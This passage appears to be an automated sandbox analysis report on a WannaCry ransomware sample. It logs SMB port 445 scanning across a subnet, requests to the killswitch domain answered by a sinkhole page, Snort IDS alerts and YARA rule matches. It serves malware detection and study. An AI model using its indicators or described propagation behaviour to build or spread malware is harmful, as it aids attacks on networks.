            Source: global trafficTCP traffic: 192.168.2.87:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.103:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.108:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.89:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.109:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.106:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.107:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.80:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.82:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.100:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.81:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.101:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.84:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.83:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.75:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.115:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.74:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.116:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.77:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.113:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.76:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.114:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.79:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.119:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.78:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.117:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.118:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.71:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.111:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.70:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.112:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.73:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.72:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.110:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.64:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.63:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.66:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.65:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.68:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.67:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.69:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.60:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.62:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.61:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.49:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.53:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.52:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.55:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.54:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.57:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.56:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.59:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.58:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.51:445Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.50:445Jump to behavior
            Source: e0R5qxY8Vj.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

            Networking

            barindex
            Tries to download HTTP data from a sinkholed server
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Oct 2022 15:16:04 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 758050aafabebb74-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 10 Oct 2022 15:16:06 GMTContent-Type: text/htmlContent-Length: 607Connection: closeServer: cloudflareCF-RAY: 758050b27d798fef-FRAData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 53 69 6e 6b 68 6f 6c 65 64 20 62 79 20 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 20 53 69 6e 6b 68 6f 6c 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 73 69 6e 6b 68 6f 6c 65 2e 63 6f 6d 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 66 6c 61 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 62 6f 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 69 67 2d 63 6f 6e 74 65 6e 74 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 68 31 3e 53 69 6e 6b 68 6f 6c 65 64 21 3c 2f 68 31 3e 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.5:50295 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.5:49698 -> 104.16.173.80:80
            Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.16.173.80:80 -> 192.168.2.5:49698
            Source: TrafficSnort IDS: 2024291 ET TROJAN Possible WannaCry DNS Lookup 1 192.168.2.5:60841 -> 8.8.8.8:53
            Source: TrafficSnort IDS: 2024298 ET TROJAN W32/WannaCry.Ransomware Killswitch Domain HTTP Request 1 192.168.2.5:49699 -> 104.17.244.81:80
            Source: TrafficSnort IDS: 2031515 ET TROJAN Known Sinkhole Response Kryptos Logic 104.17.244.81:80 -> 192.168.2.5:49699
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
            Source: unknownNetwork traffic detected: IP country count 23
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
            Source: unknownTCP traffic detected without corresponding DNS query: 175.112.244.176
            Source: unknownTCP traffic detected without corresponding DNS query: 181.2.240.55
            Source: unknownTCP traffic detected without corresponding DNS query: 63.57.242.79
            Source: unknownTCP traffic detected without corresponding DNS query: 115.13.213.249
            Source: unknownTCP traffic detected without corresponding DNS query: 41.118.158.119
            Source: unknownTCP traffic detected without corresponding DNS query: 57.136.174.144
            Source: unknownTCP traffic detected without corresponding DNS query: 25.139.62.176
            Source: unknownTCP traffic detected without corresponding DNS query: 166.230.136.54
            Source: unknownTCP traffic detected without corresponding DNS query: 13.96.109.54
            Source: unknownTCP traffic detected without corresponding DNS query: 184.137.195.142
            Source: unknownTCP traffic detected without corresponding DNS query: 35.164.16.73
            Source: unknownTCP traffic detected without corresponding DNS query: 171.59.166.143
            Source: unknownTCP traffic detected without corresponding DNS query: 34.13.244.254
            Source: unknownTCP traffic detected without corresponding DNS query: 168.135.117.110
            Source: unknownTCP traffic detected without corresponding DNS query: 173.17.34.177
            Source: unknownTCP traffic detected without corresponding DNS query: 177.190.13.142
            Source: unknownTCP traffic detected without corresponding DNS query: 67.48.71.38
            Source: unknownTCP traffic detected without corresponding DNS query: 76.121.148.49
            Source: unknownTCP traffic detected without corresponding DNS query: 159.41.171.215
            Source: unknownTCP traffic detected without corresponding DNS query: 142.206.89.123
            Source: unknownTCP traffic detected without corresponding DNS query: 67.48.71.38
            Source: unknownTCP traffic detected without corresponding DNS query: 154.180.102.251
            Source: unknownTCP traffic detected without corresponding DNS query: 82.232.183.103
            Source: unknownTCP traffic detected without corresponding DNS query: 169.45.38.102
            Source: unknownTCP traffic detected without corresponding DNS query: 32.189.3.54
            Source: unknownTCP traffic detected without corresponding DNS query: 44.124.225.93
            Source: unknownTCP traffic detected without corresponding DNS query: 7.52.92.69
            Source: unknownTCP traffic detected without corresponding DNS query: 19.41.93.173
            Source: unknownTCP traffic detected without corresponding DNS query: 41.243.241.102
            Source: unknownTCP traffic detected without corresponding DNS query: 77.205.11.30
            Source: unknownTCP traffic detected without corresponding DNS query: 170.96.121.127
            Source: unknownTCP traffic detected without corresponding DNS query: 19.41.229.6
            Source: unknownTCP traffic detected without corresponding DNS query: 191.22.31.208
            Source: unknownTCP traffic detected without corresponding DNS query: 20.144.253.79
            Source: unknownTCP traffic detected without corresponding DNS query: 194.87.28.190
            Source: unknownTCP traffic detected without corresponding DNS query: 212.101.226.163
            Source: unknownTCP traffic detected without corresponding DNS query: 189.163.61.3
            Source: e0R5qxY8Vj.exeString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
            Source: e0R5qxY8Vj.exe, 00000001.00000003.310429773.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, e0R5qxY8Vj.exe, 00000001.00000002.576260847.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
            Source: e0R5qxY8Vj.exe, 00000001.00000002.576260847.0000000000E57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com0
            Source: e0R5qxY8Vj.exe, 00000001.00000002.575615817.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ
            Source: unknownDNS traffic detected: queries for: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comCache-Control: no-cache

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Detected Wannacry Ransomware
            Source: C:\Windows\tasksche.exeCode function: CreateFileA,GetFileSizeEx,memcmp,GlobalAlloc,_local_unwind2, WANACRY!2_2_004014A6
            Yara detected Wannacry ransomware
            Source: Yara matchFile source: e0R5qxY8Vj.exe, type: SAMPLE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.2528948.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.25198c8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.1ff20a4.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.25248e8.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.0.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.e0R5qxY8Vj.exe.2528948.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.575670502.000000000042E000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.304901922.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.316455024.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.577450819.0000000002528000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.576523594.0000000001FF6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000000.308319375.000000000040F000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: e0R5qxY8Vj.exe PID: 5984, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: e0R5qxY8Vj.exe PID: 3648, type: MEMORYSTR

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: e0R5qxY8Vj.exe, type: SAMPLEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.25198c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 1.2.e0R5qxY8Vj.exe.2528948.9.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0.2.e0R5qxY8Vj.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 1.2.e0R5qxY8Vj.exe.1ff6104.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.254b96c.8.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 2.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.0.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.25198c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.25198c8.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.2019128.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 0.2.e0R5qxY8Vj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
            Source: 1.2.e0R5qxY8Vj.exe.1ff20a4.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.1ff20a4.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
            Source: 1.2.e0R5qxY8Vj.exe.1fe7084.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
